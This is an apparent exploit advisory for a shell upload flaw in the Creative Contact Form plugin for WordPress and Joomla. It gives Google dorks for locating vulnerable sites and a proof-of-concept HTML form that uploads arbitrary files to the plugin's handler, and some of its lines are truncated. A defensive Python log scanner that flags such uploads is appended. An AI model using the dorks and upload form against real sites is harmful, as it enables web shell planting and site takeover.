Creative Contact Form Shell Upload Vulnerability (Joomla & WordPress)


#- Title: WordPress and Joomla Creative Contact Form Shell Upload Vulnerability
#- Author: Vulnerability discovered by Gianni Angelozzi
                  Exploit written by Claudio Viviani
#- Date: 2014-10-25
#- Developer : creative-solutions .net
#- Link Download : creative-solutions .net/joomla/creative-contact-form
                               creative-solutions .net/wordpress/creative-contact-form
#- Google Dork: inurl:"/sexy-contact-form/" (WordPress)
                           inurl:com_creativecontactform (Joomla)
#- Fixed in Version : WordPress > 0.9.7, Joomla > 2.0.0
#- Tested on : Backbox
===================================================

-- Proof Of Concept --
Response when vulnerable : {"files":
CSRF :
<form method="POST" action="http://target. com/components/com_sexycontactform/fileupload/index.php" enctype="multipart/form-data">
  <input type="file" name="files[]" />
  <button>Upload</button>
</form>
Shell Path : Here
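
Defender-side check, added here as an example (not part of the original advisory or the exploit author's code): it scans web server access logs for POST requests that reached the plugin's upload handler without being rejected, grouped by client. The combined log format, the function name and the sample lines are assumptions; the path markers come from the advisory above.

```python
import re
from collections import defaultdict
from urllib.parse import unquote

# Path markers taken from the advisory (Joomla component names and the
# WordPress plugin directory from the dork lines).
MARKERS = ("com_sexycontactform", "com_creativecontactform", "sexy-contact-form")
# Assumption: the handler directory is called "fileupload" on both platforms;
# the advisory shows it for the Joomla component only.
UPLOAD_DIR = "/fileupload/"

# Apache/nginx "combined" access log layout (assumed).
LINE_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3}) '
)

def find_upload_posts(lines):
    """Return {client_ip: [(timestamp, raw_path, status), ...]} for POSTs that
    reached the upload handler and were not rejected (status < 400)."""
    hits = defaultdict(list)
    for line in lines:
        m = LINE_RE.match(line)
        if not m or m["method"] != "POST":
            continue
        # Drop the query string, decode %xx escapes, fold case before matching.
        path = unquote(m["path"].split("?", 1)[0]).lower()
        if UPLOAD_DIR in path and any(k in path for k in MARKERS):
            status = int(m["status"])
            if status < 400:
                hits[m["ip"]].append((m["ts"], m["path"], status))
    return dict(hits)

# Constructed sample log lines (documentation address ranges, not real traffic).
SAMPLE_LOG = [
    '203.0.113.7 - - [25/Oct/2014:10:01:02 +0000] "POST /components/com_sexycontactform/fileupload/index.php HTTP/1.1" 200 512 "-" "curl/7.35.0"',
    '198.51.100.4 - - [25/Oct/2014:10:02:10 +0000] "POST /components/com_sexycontactform/fileupload/index.php HTTP/1.1" 403 199 "-" "Mozilla/5.0"',
    '192.0.2.55 - - [25/Oct/2014:10:03:44 +0000] "POST /components/com_sexycontactform/%66ileupload/index.php HTTP/1.1" 200 498 "-" "Mozilla/5.0"',
    '192.0.2.9 - - [25/Oct/2014:10:04:00 +0000] "POST /index.php?option=com_creativecontactform HTTP/1.1" 200 2301 "-" "Mozilla/5.0"',
    '192.0.2.9 - - [25/Oct/2014:10:04:05 +0000] "GET /components/com_sexycontactform/fileupload/index.php HTTP/1.1" 200 14 "-" "Mozilla/5.0"',
]

if __name__ == "__main__":
    for ip, events in find_upload_posts(SAMPLE_LOG).items():
        print(ip, events)
```

Any client reported here on a site running a version older than the fixed releases listed above warrants a review of the files under the plugin directory.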
 